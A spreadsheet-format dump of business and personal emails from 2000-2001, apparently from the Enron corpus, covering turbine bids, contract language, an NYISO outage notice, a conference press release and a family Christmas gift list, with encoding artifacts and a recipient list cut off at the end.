&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;&gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;&gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt;_x000D_
&gt; &gt;&gt;_________________________________________________________________________x000D_
&gt; __x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; Get Your Private, Free E-mail from MSN Hotmail at_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt;http://www.hotmail.com._x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; Share information about yourself, create your own public profile_x000D_
&gt; at_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt; http://profiles.msn.com._x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt;_x000D_
&gt; &gt;__________________________________________________________________________x000D_
&gt; &gt;&gt;&gt;&gt; &gt;Get Your Private, Free E-mail from MSN Hotmail at_x000D_
&gt; &gt;&gt;&gt;&gt;http://www.hotmail.com._x000D_
&gt; &gt;&gt;&gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;Share information about yourself, create your own public profile at_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;http://profiles.msn.com._x000D_
&gt; &gt;&gt;&gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt;_x000D_
&gt; &gt;&gt;&gt;_x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;__________________________________________________________________________x000D_
&gt; ___x000D_
&gt; ___________x000D_
&gt; &gt;Get more from the Web.  FREE MSN Explorer download :_x000D_
&gt; http://explorer.msn.com_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
          ++++++CONFIDENTIALITY NOTICE+++++_x000D_
The information in this email may be confidential and/or privileged.  This_x000D_
email is intended to be reviewed by only the individual or organization_x000D_
named above.  If you are not the intended recipient or an authorized_x000D_
representative of the intended recipient, you are hereby notified that any_x000D_
review, dissemination or copying of this email and its attachments, if any,_x000D_
or the information contained herein is prohibited.  If you have received_x000D_
this email in error, please immediately notify the sender by return email_x000D_
and delete this email from your system.  Thank You</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 06:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Hi Ed,_x000D_
_x000D_
Here's the language they offered:_x000D_
_x000D_
M. Each of the Cities has obligated itself to be responsible for and to pay=_x000D_
=20_x000D_
to, or on behalf of, MDEA, if required, that proportion of the minimum=20_x000D_
monthly fee which that City=01,s hourly demand was coincident with Entergy=_x000D_
=01,s=20_x000D_
peak hour demand in the year 2000 bears to the sum of both Cities=01, hourl=_x000D_
y=20_x000D_
demand during such hour; provided however, that each City has further=20_x000D_
obligated itself to be responsible for and to pay that portion of EMPI=01,s=_x000D_
=20_x000D_
monthly fee which the economic benefit to that City from transactions bears=_x000D_
=20_x000D_
to the total economic benefit to both Cities from such transactions during=_x000D_
=20_x000D_
the month._x000D_
_x000D_
_x000D_
It is a bit cumbersome, but I think I like it.  What do you think?_x000D_
_x000D_
I'll forward the entire doc soon._x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 14:21:14 -0700 (PDT)</t>
  </si>
  <si>
    <t>NYISO - Public Web Site Unavailable</t>
  </si>
  <si>
    <t>_x000D_
"market_relations@nyiso.com" &lt;market_relations@nyiso.com&gt; writes to the NYISO_TECH_EXCHANGE Discussion List:_x000D_
_x000D_
Dear Market Participants,_x000D_
_x000D_
The NYISO web servers are down and the nyiso.com site is not available.  We_x000D_
are working on the problem and anticipate having the servers available_x000D_
soon.  In the meantime, you can submit bids directly to one of the_x000D_
following addresses:_x000D_
_x000D_
https://mtdev2.nyiso.com_x000D_
https://mt2.nysio.com_x000D_
_x000D_
Regards,_x000D_
_x000D_
Customer Relations_x000D_
518-356-6060</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 14:08:18 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'wcasso@zeusdevelopment.com'})</t>
  </si>
  <si>
    <t>Unocal, Tesoro, Pioneer, Equiva, Reliant to Provide Opening-Day_x000D_
 Insights at IE2001</t>
  </si>
  <si>
    <t>Headline:  "Unocal, Tesoro, Pioneer, Equiva, Reliant Among Energy Companies_x000D_
Providing Opening-Day Insights at Interactive Energy 2001"_x000D_
_x000D_
HOUSTON, TEXAS, November 19, 2001 - The opening-day program for Interactive_x000D_
Energy has been set with presentations from SAP, Booz Allen Hamilton and_x000D_
case studies and panel discussions from management from such companies as_x000D_
Reliant, Equiva, Tesoro, Unocal and SAIC.  _x000D_
_x000D_
Les Amidei, VP of business development for process from SAP America, will_x000D_
open the session to discuss how energy companies are working to gain maximum_x000D_
returns from their current investments.  Many of the larger companies_x000D_
committed to SAP's enterprise resource planning (ERP) systems during the_x000D_
past 15 years, and new innovations must interface with SAP to access and_x000D_
uplink enterprise data._x000D_
_x000D_
"With all the great promises of the internet, the energy industry has made_x000D_
numerous investments in information technology," notes Amidei.  "The reality_x000D_
is that while many have delivered, many [others] have not. As a result, the_x000D_
overall climate has changed dramatically where any investment in technology_x000D_
will be driven by measurable and quantifiable ROI. Leveraging existing_x000D_
investments such as ERP into new arenas will be critical in assuring maximum_x000D_
value is delivered.""_x000D_
_x000D_
A panel of senior technology officers, including Xavier Flinois, president,_x000D_
Schlumberger Network Solutions; Tom Halbouty, CIO, Pioneer Natural_x000D_
Resources; Paul Cuneo, CIO, Equiva Services LLP; and Ray Cline, CTO, SAIC,_x000D_
will follow Amidei's presentation.  Each panelist will be asked how he or_x000D_
she is prioritizing IT spending and levering from investments made in_x000D_
previous years to maximize profitability. Accenture Partner Jeff Sakaguchi_x000D_
will direct the discussion.  Then, Eduardo Alvarez, partner of Booz Allen_x000D_
Hamilton will wrap up the morning with a presentation on how some energy_x000D_
companies have managed innovation more effectively and what can be learned_x000D_
from their strategies.  _x000D_
_x000D_
In the afternoon, the conference will feature the results of an IT survey_x000D_
conducted by Booz Allen Hamilton and Zeus Development Corporation, which_x000D_
investigates how the upstream, refining and gas and power sectors are_x000D_
prioritizing IT spending. The two firms have joined in the research project_x000D_
to interview information officers at many of the world's leading energy_x000D_
firms to understand how they are currently managing IT investment.  The_x000D_
report will enhance and build upon the earlier presentations, providing a_x000D_
broader industry perspective. _x000D_
_x000D_
Then, four case studies will be presented: The first entitled, "Dropping the_x000D_
'E:' Moving E-Business to Just Business" by_x000D_
Tim Pownell, general manager, e-procurement project, will discuss how _x000D_
Unocal is in the process of fully integrating their e-business systems into_x000D_
the mainstream practices of the company. _x000D_
_x000D_
The second, entitled "Rapid ERP Integration: A New Supervisory Application_x000D_
to Reduce Training Time and Improve Inventory Accuracy," which will be_x000D_
presented by Mark Evans, CIO, Tesoro, will discuss how Tesoro was able to_x000D_
integrate its marine logistics unit into the broader SAP ERP to improve_x000D_
performance, inventory accuracy and employee satisfaction. _x000D_
_x000D_
The third and fourth presentations will be made by management from Reliant_x000D_
Resources Inc. to describe how they are using IT to prepare for Texas'_x000D_
forthcoming deregulated marketplace.  Will Symmes, director - energy_x000D_
information systems, will describe how Reliant has developed an_x000D_
internet-based energy information and analysis portal for large industrial_x000D_
customers, entitled "Energy Commander."  Then, Ron Orsini, vice president -_x000D_
eBusiness, will discuss how Reliant is investigating home automation_x000D_
technology to better serve residential and small business accounts. _x000D_
_x000D_
"We're very pleased with the lineup for Wednesday and believe it provides a_x000D_
most important full-day forum for the opening discussion of Interactive_x000D_
Energy," said Nimocks. "In the final analysis, our job is to facilitate the_x000D_
exchange of information and ideas so advancements can be made more_x000D_
efficiently, and this lineup promises to do that."_x000D_
_x000D_
About Interactive Energy_x000D_
Interactive Energy will be held at Houston's George R. Brown Convention_x000D_
Center, Dec. 4-7.  The annual conference and exhibition covers information_x000D_
technology (IT) advancements in the energy industry and features numerous_x000D_
case studies of technology implementations, new software demonstrations,_x000D_
business plans and special workshops.  To register, please phone Mel Ladin_x000D_
at 832-200-3704 or go to www.interactiveenergy and click on "Register Now"._x000D_
Conference Sponsors of Interactive Energy 2001 already include Enermetrix_x000D_
(www.enermetrix.com) SAIC (www.saic.com), AT&amp;T (www.att.com), Microsoft_x000D_
Corporation (www.microsoft.com), Luminant Worldwide (www.luminant.com),_x000D_
Unisys (www.unisys.com), Conchango (www.conchango.com), Proclarity_x000D_
(www.proclarity.com), Silicon Energy (www.siliconenergy.com), Avocent_x000D_
(www.pixelvision.com), documentum (www.documentum.com), appropria_x000D_
(www.appropria.com) and Oracle (www.oracle.com).  Supporters include PR_x000D_
Newswire, Energy Central, TIPRO, Techxans and the Houston Business Journal._x000D_
_x000D_
About Zeus Development Corporation: _x000D_
Celebrating its tenth year of incorporation, Zeus Development Corporation is_x000D_
a privately owned research consultancy offering strategic and business_x000D_
development information through reports, monthly periodicals, databases,_x000D_
consulting services and conferences to the energy industry in the areas of_x000D_
information technology and downstream natural gas development.  For more_x000D_
information, contact Ms. Whitney Casso, 832-200-3718 or_x000D_
wcasso@zeusdevelopment.com &lt;mailto:wcasso@zeusdevelopment.com&gt;._x000D_
_x000D_
andy.zipper@enron.com</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 09:09:45 -0800 (PST)</t>
  </si>
  <si>
    <t>happy anniversary</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Return Receipt_x000D_
                                                                           _x000D_
    Your      happy anniversary                                            _x000D_
    document                                                               _x000D_
    :                                                                      _x000D_
                                                                           _x000D_
    was       Kerry Carter/SCI                                             _x000D_
    received                                                               _x000D_
    by:                                                                    _x000D_
                                                                           _x000D_
    at:       11/19/2001 11:13:04 AM                                       _x000D_
                                                                           _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 02:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: GE Turbines</t>
  </si>
  <si>
    <t xml:space="preserve">We need to know how probable the other projects are; at what point do we _x000D_
propose to put the turbines back on the market for re-sale; and what is our _x000D_
best estimate of the potential downside upon re-sale._x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Jacoby, Ben  _x000D_
Sent: Friday, June 01, 2001 9:47 AM_x000D_
To: Schneider, Chip; Mann, Kay_x000D_
Cc: Deffner, Joseph; Duran, W. David; Manis, Herman; Engeldorf, Roseann; _x000D_
Bills, Lisa; Booth, Chris_x000D_
Subject: RE: GE Turbines_x000D_
_x000D_
I think we decided to take the turbine purchase approval route, and describe _x000D_
the several projects (Midway et al) that we can match the turbines with. Are _x000D_
you still OK with that?_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Schneider, Chip  _x000D_
Sent: Friday, June 01, 2001 9:05 AM_x000D_
To: Mann, Kay; Jacoby, Ben_x000D_
Cc: Deffner, Joseph; Duran, W. David; Manis, Herman; Engeldorf, Roseann; _x000D_
Bills, Lisa_x000D_
Subject: RE: GE Turbines_x000D_
_x000D_
Depending upon the route we take for approval (turbine purchase vs. project _x000D_
approval), the DASH process should take no more than 5 to 10 days.  How firm _x000D_
are we on the Midway project?_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Mann, Kay  _x000D_
Sent: Friday, June 01, 2001 8:47 AM_x000D_
To: Jacoby, Ben_x000D_
Cc: Deffner, Joseph; Duran, W. David; Manis, Herman; Engeldorf, Roseann; _x000D_
Schneider, Chip; Bills, Lisa_x000D_
Subject: RE: GE Turbines_x000D_
_x000D_
I think Ben's time frame is realistic. I assume we will enter into an _x000D_
assignment and assumption agreement with Sithe, to which GE will consent. In _x000D_
addition, we may need an override letter to the turbine contract to address _x000D_
the E-Next/accounting issues. GE is familiar with what we need in for E-Next, _x000D_
which should help expedite matters.  _x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
From: Ben Jacoby/ENRON@enronXgate on 05/31/2001 07:55 PM_x000D_
To: Joseph Deffner/ENRON@enronXgate, Kay Mann/Corp/Enron@Enron, W David _x000D_
Duran/ENRON@enronXgate, Herman Manis/ENRON@enronXgate, Roseann _x000D_
Engeldorf/ENRON@enronXgate, Chip Schneider/ENRON@enronXgate, Lisa _x000D_
Bills/ENRON@enronXgate_x000D_
cc:  _x000D_
_x000D_
Subject: RE: GE Turbines_x000D_
_x000D_
I've been told that we need to resubmit a non-binding expression of interest _x000D_
by Tuesday. Previously, we submitted a one page non-binding letter indicating _x000D_
that the FMV of the units is $44 MM each. You raise a good point in that we _x000D_
should be prepared to say (again, on a non-binding basis) how long we will _x000D_
need to close (in addition to increasing the bid on the units). I think if _x000D_
our number is good, 30 - 45 days for documentation and close would work, but _x000D_
I think we should also be willing to post some non-refundable $s within say, _x000D_
2 weeks on the basis of an exclusivity agreement with Sithe. _x000D_
_x000D_
The group's thoughts on this would be appreciated._x000D_
_x000D_
Thanks._x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Deffner, Joseph  _x000D_
Sent: Thursday, May 31, 2001 6:56 PM_x000D_
To: Jacoby, Ben; Mann, Kay; Duran, W. David; Manis, Herman; Engeldorf, _x000D_
Roseann; Schneider, Chip; Bills, Lisa_x000D_
Subject: RE: GE Turbines_x000D_
_x000D_
What is expected for the Tuesday bid? I would guess the most critical from a _x000D_
timing perspective will be a response centered on price and _x000D_
commercial/technical issues. Michael indicates below he would like a _x000D_
timetable for internal approvals to a closing. Do we have any indication how _x000D_
pressed he is to close and fund versus agreeing on economic terms quickly and _x000D_
allowing us to review the form of contract to ensure compliance with _x000D_
accounting and finance guidlelines along the lines of our discussion earlier _x000D_
this week? Thanks._x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Jacoby, Ben  _x000D_
Sent: Thursday, May 31, 2001 5:59 PM_x000D_
To: Mann, Kay; Schneider, Chip; Bills, Lisa; Manis, Herman; Engeldorf, Roseann_x000D_
Cc: Booth, Chris; Rose, Steven; Virgo, Robert; Duran, W. David_x000D_
Subject: FW: GE Turbines_x000D_
_x000D_
All:_x000D_
_x000D_
FYI, tomorrow I should receive turbine contracts for the 3 GE 7FAs being sold _x000D_
by Site. Please see the e-mail below from Sithe's advisor regarding the _x000D_
transaction schedule. Kay and I plan to initially review the contract, and I _x000D_
have a technical team (Booth / Rose) ready to review the contracts as well._x000D_
_x000D_
From an accounting / finance perspective, I am interested in how we should _x000D_
proceed given the circumstances. Kay and my initial plan is to review the _x000D_
contracts from a technical / legal / commercial perspective and submit a _x000D_
revised indicative number by Tuesday in consultation with Duran. Between now _x000D_
and then, it would be helpful to know from accounting / finance how we should _x000D_
proceed given that we are in a bidding situation (with I'm told three other _x000D_
bidders). Herman / Rose / Lisa - please let me know your thoughts on this._x000D_
_x000D_
Chip - I would like Chris Booth to work with you on putting a draft DASH _x000D_
together._x000D_
_x000D_
In the meantime, I will forward turbine contracts to everyone as soon as I _x000D_
receive them._x000D_
_x000D_
Regards,_x000D_
_x000D_
Ben _x000D_
_x000D_
 -----Original Message-----_x000D_
From:  MKolman@rcgroup.com@ENRON _x000D_
[mailto:IMCEANOTES-MKolman+40rcgroup+2Ecom+40ENRON@ENRON.com] _x000D_
Sent: Thursday, May 31, 2001 2:40 PM_x000D_
To: Ben.F.Jacoby@enron.com_x000D_
Subject: Re: GE Turbines_x000D_
_x000D_
_x000D_
Ben:_x000D_
_x000D_
Per our conversation today, the turbine contract and LTSA are being sent_x000D_
via Fed Ex to your office in Houston._x000D_
_x000D_
Final bids are due next Tuesday, June 5th via fax to 781-270-0055.  Bids_x000D_
should include best price and a closing schedule (date by which bidder will_x000D_
have all internal approvals necessary to enter into a binding agreement_x000D_
with Seller subject only to consent from GE)._x000D_
_x000D_
Thanks again for you patience and please call me if you have any questions,_x000D_
_x000D_
Michael_x000D_
_x000D_
================_x000D_
Michael A. Kolman_x000D_
Principal_x000D_
Navigant Capital_x000D_
(781) 564-9774 (direct)_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Jul 2001 04:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Let's go ahead and do a call.  Good time for the 3 of us to catch up on what _x000D_
we've been up to (unless Alan and Sue are strongly opposed).  But no need to _x000D_
set up a formal agenda._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	Joseph Alamo_x000D_
	07/10/2001 11:41 AM_x000D_
		 _x000D_
		 To: Susan J Mara/NA/Enron, Jeff Dasovich/NA/Enron, Alan _x000D_
Comnes/ENRON@enronXgate_x000D_
		 cc: _x000D_
		 Subject: Weekly Staff meeting?_x000D_
_x000D_
_x000D_
Did you folks want to try to have a Staff meeting/call this week?_x000D_
or would you rather let it go until Paul returns?_x000D_
_x000D_
Pls advise,_x000D_
Thanks,_x000D_
Joseph_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 00:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 03/12/2001 _x000D_
08:15 AM ---------------------------_x000D_
_x000D_
_x000D_
"Btu" &lt;subs@btu.net&gt; on 03/09/2001 04:47:33 PM_x000D_
To: "Btu Weekly" &lt;&gt;_x000D_
cc:  _x000D_
Subject: Btu Weekly_x000D_
_x000D_
_x000D_
_x000D_
Attached is the latest issue of Btu Weekly._x000D_
_x000D_
e-mail: info@Btu.net_x000D_
phone: 732-758-8222_x000D_
fax: 732-758-8286_x000D_
_x000D_
_x000D_
 - wg031201.pdf_x000D_
</t>
  </si>
  <si>
    <t>Fri, 2 Feb 2001 23:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>NEON Discussion February 7</t>
  </si>
  <si>
    <t>Here's something you might want to work with this  week.?I'm praying things _x000D_
are going well for all of you.? If there's  something I can do let me know._x000D_
?_x000D_
Bobby_x000D_
 - Compassion.doc</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 04:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Talking points about California Gas market</t>
  </si>
  <si>
    <t xml:space="preserve">Christy,_x000D_
_x000D_
 I read these points and they definitely need some touch up.  I don't _x000D_
understand why we need to give our commentary on  why prices are so high in _x000D_
California.  This subject has already gotten so much press.  _x000D_
_x000D_
Phillip_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Phillip K Allen/HOU/ECT on 12/12/2000 _x000D_
12:01 PM ---------------------------_x000D_
From: Leslie Lawner@ENRON on 12/12/2000 11:56 AM CST_x000D_
To: Christi L Nicolay/HOU/ECT@ECT, Joe Hartsoe/Corp/Enron@ENRON, Rebecca W _x000D_
Cantrell/HOU/ECT@ECT, Ruth Concannon/HOU/ECT@ECT, Stephanie _x000D_
Miller/Corp/Enron@ENRON, Phillip K Allen/HOU/ECT@ECT, Jane M _x000D_
Tholt/HOU/ECT@ECT, Richard Shapiro/NA/Enron@Enron_x000D_
cc:  _x000D_
Subject: Talking points about California Gas market_x000D_
_x000D_
Here is my stab at the talking points  to be sent in to FERC along with the _x000D_
gas pricing info they requested for the California markets.  Let me or _x000D_
Christi know if you have any disagreements, additions, whatever.  I am _x000D_
supposed to be out of here at 2:15 today, so if you have stuff to add after _x000D_
that, get it to Christi.  Thanks._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 28 Jan 2000 06:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>New IS&amp;S Request for Steve Kean</t>
  </si>
  <si>
    <t xml:space="preserve">SK - I went ahead and approved this request.  This is to make your computer _x000D_
faster. mm_x000D_
_x000D_
_x000D_
You have received a new IS&amp;S request for Steve Kean.  Please review the _x000D_
request and make any necessary changes.  If you approve the access, please _x000D_
click the Approve button at the top of the request form and EES Security will _x000D_
receive notification.  You may click the link at the end of this message to _x000D_
view the request document._x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 07:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>El Paso Electric Company Deal # 460852</t>
  </si>
  <si>
    <t>Hi Kate!_x000D_
I just want to make sure that this is the correct counterparty name.  Usually _x000D_
we trade with El Paso Merchant Energy, L.P.  Is this name entered correctly?_x000D_
Kim</t>
  </si>
  <si>
    <t>Sun, 10 Dec 2000 09:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dasovichd@aol.com'})</t>
  </si>
  <si>
    <t>frozenset({'dasovich63@hotmail.com', 'jeff_dasovich@enron.com', 'robert.holt@eng.sun.com', 'charryl@pacbell.net', 'rrf_gibson@marad.dot.gov'})</t>
  </si>
  <si>
    <t>Christmas presents--we've picked the names</t>
  </si>
  <si>
    <t>Merry Christmas to all!_x000D_
_x000D_
Thanks to Jeff for picking the names._x000D_
The list is below; buyer on the left, recipient is on the right. Now our_x000D_
shopping can begin...._x000D_
_x000D_
Mom     buys for        Debbie_x000D_
Jeff                           Mike_x000D_
Prentice                    Steve_x000D_
Robert                      Charry_x000D_
Dad                          Nancy_x000D_
Steve                        Robert_x000D_
Nancy                       Jeff_x000D_
Charry                       Prentice_x000D_
Mike                         Mom_x000D_
Debbie                      Dad_x000D_
_x000D_
Jeff, please forward this to Prentice.  I will call Mom and Dad._x000D_
_x000D_
Finally, Mike and I are hosting Christmas Day at our house with a big assist_x000D_
from Jeff on the dinner preparation.  I will probably do it the same way we_x000D_
do Thanksgiving at Steve and Charry's by asking each of you to bring/make_x000D_
something.  We are looking forward to having you all here._x000D_
_x000D_
Debbie</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 12:31:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'connie.hook@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'john.millar@enron.com', 'ken.powers@enron.com', 'jan.moore@enron.com', 'dave.neubauer@enron.com', 'frank.oldenhuis@enron.com', 'eric.gadd@enron.com', 'loren.penkava@enron.com', 'john.dushinske@enron.com', 'steve.gilbert@enron.com', 'vernon.mercaldo@enron.com', 'larry.swett@enron.com', 'courtney.barker@enron.com', 'laura.lantefield@enron.com', 'chuck.wilkinson@enron.com', 'bob.stevens@enron.com', 'tom.halpin@enron.com', 'connie.hook@enron.com', 'kent.miller@enron.com', 'mike.barry@enron.com', 'tk.lohman@enron.com', 'kay.threet@enron.com', 'lorna.brennan@enron.com', 'lisa.valley@enron.com', 'vicki.berg@enron.com', 'kevin.hyatt@enron.com', 'roger.westfall@enron.com', 'audrey.robertson@enron.com', 'tim.johanson@enron.com', 'allen.cohrs@enron.com', 'richard.riehm@enron.com', 'frank.semin@enron.com', 'doug.aschwege@enron.com', 'penny.mccarran@enron.com', 'w..mcgowan@enron.com', 'jo.williams@enron.com', 'jane.joyce@enron.com', 'g..stage@enron.com', 'john.pritchard@enron.com', 'becki.sans@enron.com', 'l..johnson@enron.com', 'sean.bolks@enron.com', 'stephanie.korbelik@enron.com', 'dana.jones@enron.com', 'larry.pavlou@enron.com', 'steve.thomas@enron.com', 'pilar.ramirez@enron.com', 'janet.bowers@enron.com', 'bob.burleson@enron.com', 'reyna.cabrera@enron.com', 'susan.wadle@enron.com', 'john.fiscus@enron.com', 'john.williams@enron.com', 'kimberly.watson@enron.com', 'steven.harris@enron.com', 